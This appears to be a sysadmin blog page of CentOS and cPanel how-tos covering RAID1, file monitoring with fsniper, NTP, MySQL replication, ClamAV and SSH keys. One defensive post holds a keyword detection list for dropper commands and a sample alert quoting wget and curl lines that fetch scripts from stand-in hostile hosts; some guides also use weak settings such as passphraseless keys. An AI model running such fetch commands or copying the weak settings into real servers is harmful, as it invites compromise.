Create RAID1 for New Hard Disks via SSH/Online

Following steps are my way on delivering RAID1 (mirrored disks) via SSH in my production server. What we need is 2 new HDD which having same disk space and already plug into the server. Variables as below:

OS = CentOS 5.6 64bit
/dev/sdb = new hard disk #1
/dev/sdc = new hard disk #2
/dev/sdb1 = partition 1 hard disk #1
/dev/sdc1 = partition 1 hard disk #2
/dev/md1 = RAID1 partition after both disk mirrored
/home2 = mount point for RAID1

1. Review the information about total space and available space on a file system:

[root@centos ~] df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/mapper/VolGroup00-LogVol00
47G  3.3G   41G   8% /
/dev/sda1              99M   13M   81M  14% /boot
tmpfs                 249M     0  249M   0% /dev/shm

2. Review the disk information detected in the system. Make sure /dev/sdb and /dev/sdc are in the list:

[[email protected] ~] fdisk -l
 
Disk /dev/sda: 53.6 GB, 53687091200 bytes
255 heads, 63 sectors/track, 6527 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
 
Device Boot      Start         End      Blocks   Id  System
/dev/sda1   *           1          13      104391   83  Linux
/dev/sda2              14        6527    52323705   8e  Linux LVM
 
Disk /dev/sdb: 21.4 GB, 21474836480 bytes
255 heads, 63 sectors/track, 2610 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
 
Disk /dev/sdb doesn't contain a valid partition table
 
Disk /dev/sdc: 21.4 GB, 21474836480 bytes
255 heads, 63 sectors/track, 2610 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
 
Disk /dev/sdc doesn't contain a valid partition table

3. Install mdadm via yum:

yum install mdadm -y

Continue reading “Create RAID1 for New Hard Disks via SSH/Online” »

Detect New Files and Send Notification if Suspicious

This post will required Fsniper installed and running on your box. Please see following post: FSniper – Monitor Newly Created Files in Directory . This is similar to popular paid-version of ConfigServer eXploit Scanner (cxs), which also using inotify functionality which comes since kernel 2.6.13.

I am using Fsniper to check and detect new files and let handler trigger following scripts. This scripts will log any new files which captured by FSniper to /var/www/html/new_files.txt (so i can browse the files using web browser by accessing http://yourwebsite.com/new_files.txt) and then notify me whenever they found any of suspicious words inside the files:
wget, curl, lynx, gcc, perl, sh, cd, mkdir, touch, base64

#!/bin/bash
output_file='/var/www/html/new_files.txt'
user_owner=`ls -al $1 | awk '{print $3}'`
ip=`hostname -i`
subject='Found something suspicious'
emailto='[email protected]'
message=/tmp/emailmessage.txt
 
echo $(date +"%Y-%m-%d") $(date +%k:%M) ">>" $1 "|" $user_owner >> $output_file
 
danger=`egrep -iH '(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch|base64)' $1 | wc -l`
 
if [ $danger -gt 0 ]; then
echo 'Server:' $(hostname) > $message
egrep -iH '(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch|base64)' $1 >> $message
mail -s "$ip | $subject"  "$emailto" < $message
fi

The email you will received will be similar like this:

From: root
To: [email protected]
Subject: 192.168.1.1 | Found something suspicious
Email Body:
 
Server: hostname.myserver.domain.tld
/home/user/public_html/test3.php:wget http://192.168.0.100/bad_thing.php
/home/user/public_html/test3.php:curl http://hackers.tld/scripts

This will help you monitor any changes files and make sure you are the first to know if the new files is containing unwanted words. You can modify the script to suit your needs.

FSniper – Monitor Newly Created Files in Directory

Fsniper is a good utility that waits for a file to be changed, then executes a command on that file. Means, whenever newly files created, we can do something with that files while fsniper returning the path and file name. From this, we can manipulate the result to execute another task like sending notification or move the files to specific folder based on MIME types.

Example of FSniper usage can be as follows:

  1. Categorize newly created files based on MIME into specified directory
  2. Notify system administrator that new files has been created via email
  3. Move or delete unwanted files based on extension from the directory that being watched
  4. Scan new files with ClamAV and send the results via email
  5. Much more, you can think by yourself

In this case, I was using following variables:

Server OS: CentOS 5.6 64bit
Directory to be watched: /home/user/public_html
Files being monitored: Images and text files
Action to be taken: Output it to another text files with date, time and files owner

Login into the server and do as follows:

1. Install dependencies via yum:

yum install pcre* file-libs file-devel -y
									

2. Download fsniper using wget. You can find the source at http://freshmeat.net/projects/fsniper :

wget http://projects.l3ib.org/fsniper/files/fsniper-1.3.1.tar.gz
									

3. Extract the downloaded files:

tar -xzf fsniper-1.3.1.tar.gz
									

4. Enter the directory, configure and install:

cd fsniper-*
./configure
make
make install
									

5. Fsniper is installed. Try to run it by executing following command:

fsniper --verbose
									

6. You will see some error telling you that it cant find the configuration files. So we need to build it. Stop the FSniper process by pressing ctrl+C

7. Create the config files under /root/.config/fsniper/ directory:

touch /root/.config/fsniper/config
									

Continue reading “FSniper – Monitor Newly Created Files in Directory” »

Setup NTP Server and Sync Time with Client

I show you how to setup and sync time with your client to a server for example when you want to have successful master/slave MySQL replication. Most of replication or client/server services should have time sync and identical to make sure no duplicate or backdated data.

In this case we will using 2 servers. Variables as follow:

Server1 = 192.168.1.1
Client1 = 192.168.1.2

Now we setup NTP server in Server1:

1. Install NTP via yum:

yum install ntp -y
									

2. Enable NTP services to be auto start upon boot:

chkconfig ntpd on
									

3. Open /etc/ntp.conf via text editor and add following line:

restrict 192.168.1.0 mask 255.255.255.0
									

4. Save the file and allow the port 123 in your firewall in iptables:

iptables -A INPUT -s 192.168.1.0/24 -m state --state NEW -p udp --dport 123 -j ACCEPT
									

5. Start NTP service:

service ntpd start
									

Now we need to configure Client1 to sync time with our NTP server. Login to your client and as follow:

1. Install NTP service:

yum install ntp -y
									

2. Sync the time with Server1:

ntpdate -u 192.168.1.1
									

3. Start the NTP service:

service ntpd start
									

4. Verify the synchronization with command date:

date
									

The Best Way to Setup MySQL Replication

In this case, I have 2 servers installed with MySQL 5 and running in CentOS 5. Assuming Server1 is master server and currently host a database called db1 and Server2 is slave server and have nothing inside.

Variable used in this case:

Server1 IP=192.168.1.1
Server2 IP=192.168.1.2
Database name=db1
Replication user=replicator
Replication user password=slavepass

Now we configure Server1 first. Login to the server and do following:

1. Login to Server1 and open MySQL configuration file, /etc/my.cnf and add following lines under [mysqld] section:

[mysqld]
server-id=100
log-bin=master-bin
									

2. Restart MySQL:

service mysqld restart
									

3. Create a user account so slave can use to connect to this master server:

mysql> GRANT REPLICATION SLAVE on *.* to 'replicator'@'%' IDENTIFIED BY 'slavepass';
									

4. Dump the database so we can bring the database to the slave server:

mysqldump -u[root] -p[password] --master-data --single-transaction db1 > db1.sql
									

Continue reading “The Best Way to Setup MySQL Replication” »

Debian/Ubuntu – Make SSH Terminal Run with Colors

For those who actually get used to have colors in SSH terminal session, will surely feels weird if you SSH into Debian/Ubuntu because by default, the terminal session will NOT run with color-enabled mode. It might be small issue but it will help you a lot in administrating and managing the Linux box when you can see and differentiate things with colors.

What you need to do is replace following content into /root/.bashrc or /home/any_user/.bashrc file (this is actually an extended version with some tweak for your .bashrc file to enable colors):

Continue reading “Debian/Ubuntu – Make SSH Terminal Run with Colors” »

cPanel – Update ClamAV

If you facing below error when running clamscan especially in cPanel:

LibClamAV Warning: ***********************************************************
LibClamAV Warning: *** This version of the ClamAV engine is outdated. ***
LibClamAV Warning: *** DON'T PANIC! Read http://www.clamav.net/support/faq ***
LibClamAV Warning: ***********************************************************
									


Which means the new stable ClamAV version has been released and recommended for you to upgrade. Below is the steps need to follow:

1. Download the latest stable version of ClamAV by go to http://www.clamav.net/download/sources

wget http://downloads.sourceforge.net/clamav/clamav-0.97.1.tar.gz
									

2. Extract the download file:

tar -xzf clamav-*
									

3. Compile the sources:

cd clamav-*
if [ -d "/usr/lib64" ]; then libdir="--libdir=/usr/lib64" ; fi ; ./configure --prefix=/usr $libdir --sysconfdir=/etc --disable-ipv6 --disable-zlib-vcheck
make
make install
									

4. Update virus definitions:

freshclam
									

Public Key for SSH Authentication

Password-less SSH can really help server administrator on accessing from different node to another. This is possible by setting up the public key for SSH authentication in source and destination server.

1. Create your public and private key pair by typing:

ssh-keygen -t dsa
									

2. The key generator will ask you where you want to save your key. Press Enter to accept the default.

3. Next, the generator will prompt you to enter a passphrase. Press Enter without entering a passphrase. (You must leave this blank to make sure that destination server will not prompt out anything when authenticating SSH user)

You will need to copy your public key to your destination server. Do this by entering the following command (you will need to enter your password just this one time after you press Enter):

ssh-copy-id -i ~/.ssh/id_dsa [email protected]
									

*user = the username of your destination server
*serverIP = the IP address of your destination server

Test your setup by entering: ssh user@serverIP. If you’ve set this up correctly, you shouldn’t have to enter any login details, and now you are ready to connect to the destination server without hassle of remembering the password.

WHM/Cpanel Logs in Details

cPanel/WHM Initial Installation Errors:
Location : /var/log/cpanel*install*
Description : These log files contain cPanel installation logs & should be referenced first for any issues resulting from new cPanel installations.

—————————————————————————

Cpanel/WHM Accounting Logs:
Location : /var/cpanel/accounting.log
Description : Contains a list of accounting functions performed through WHM, including account removal and creation.

—————————————————————————

Cpanel/WHM Service Status Logs:
Location : /var/log/chkservd.log
Description :The service monitoring demon (chkservd) logs all service checks here. Failed service are represented with a [-] and active services are represented by [+].

—————————————————————————

cPanel error logs:
Location : /usr/local/cpanel/logs/error_log
Description : cPanel logs any error it incurs here. This should be checked when you encounter errors or strange behavior in cPanel/WHM.

—————————————————————————

cPanel License Error Logs:
Location : /usr/local/cpanel/logs/license_log
Description : All license update attempts are logged here. If you run into any errors related to license when logging in, check here.

—————————————————————————

Stats Daemon Logs:
Location : /usr/local/cpanel/logs/stats_log
Description : The stats daemon (cpanellogd) logs the output from all stats generators (Awstats, Webalizer, Analog) here.

—————————————————————————

Client Information, Requested URL Logs:
Location : /usr/local/cpanel/logs/access_log
Description : General information related to access cPanel requests is logged here.

—————————————————————————

cPanel/WHM Update Logs:
Location : /var/cpanel/updatelogs/update-[TIMESTAMP].log
Description : Contains all output from each cPanel update [upcp]. It’s named with the timestamp at which the upcp process was initiated.

—————————————————————————

Bandwidth Logs:
Location : /var/cpanel/bandwidth
Description : Files contain a list of the bandwidth history for each account. Each named after their respective user.

—————————————————————————

Tailwatchd [New]:
Location : /usr/local/cpanel/logs/tailwatchd_log
Description : Logs for daemon configuired under tailwatchd ie. cPBandwd, Eximstats, Antirelayd.

—————————————————————————

Apache Logs:.

General Error and Auditing Logs:
Location : /usr/local/apache/logs/error_log
Description : All exceptions caught by httpd along with standard error output from CGI applications are logged here.
The first place you should look when httpd crashes or you incur errors when accessing website.

Continue reading “WHM/Cpanel Logs in Details” »

Shrink MSSQL Database Transaction Logs

Have you ever encounter problem when managing MSSQL databases, the transactions logs is eating up your hard disk if you not initially configured to be limit in growth value. So, when you see this kind of problem, you actually can shrink the transaction log, and then change the limit of growth value using MSSQL Management Studio.

1. Open MSSQL Management Studio

2. Open the SQL command windows and put following lines

USE <DatabaseName>
GO
DBCC SHRINKFILE(<TransactionLogName>, 1)
BACKUP LOG <DatabaseName> WITH TRUNCATE_ONLY
DBCC SHRINKFILE(<TransactionLogName>, 1)
GO
									

Replace the <DatabaseName> and <TransactionLogName> with respective value and execute the SQL. Now your transaction logs will be shrinked and you will save a lot of disk space. Do not forget to do the prevention action afterwards!

User Manual: cPanel + WHM in PDF

cPanel is no doubt to be well-known in the Linux hosting control panel. They have good online documentation, active communities especially in forum and also reliable on technical/sales support. But, we hardly find the documentation in PDF version which downloadable and can be print out as a book.

Here’s I share with you on the cPanel and WHM user manual. I found these some where in Internet but I cant remember which site I get it from (sorry for no credit back to the author). You can click following links to download:

cPanel_11_User_Manual – 402 KB – 189 pages

WHM_Administrator_Manual – 1.01 MB – 352 pages

Note: It is not as update as the latest version

Installation – Standalone Spam Assassin Server

This is my way on installing dedicated spam assassin server to be integrated with my internal mail server. This server better be run as virtual machine due to easy deployment and not heavy resources needed (depending on how many spam process you want it to run). In this case, we will use CentOS 5.5 64bit.

1. Install required RPM

yum install -y db4 db4-devel gcc libstdc++ libstdc++-devel

2. Update kernel, and others

yum update kernel
yum update

3. Reboot

4. Open Perl shell and install required perl modules

perl -MCPAN -e shell

(for first time user, you might need to accept default value if prompted)

install HTML::Parser
install NetAddr::IP
install Net::DNS::Resolver::Programmable
install Net::Ident
install Net::DNS
install DB_File
install Digest::SHA1
install Time::HiRes
install MIME::Base64
install Getopt::Long
install File::Copy
install Mail::SPF
install Mail::SPF::Query
install Mail::DKIM
install IP::Country
install IO::Socket::INET6
install IO::Socket::SSL
install Compress::Zlib
install LWP::UserAgent
install HTTP::Date
install Archive::Tar
install IO::Zlib
install Encode::Detect
install URI::Escape

Continue reading “Installation – Standalone Spam Assassin Server” »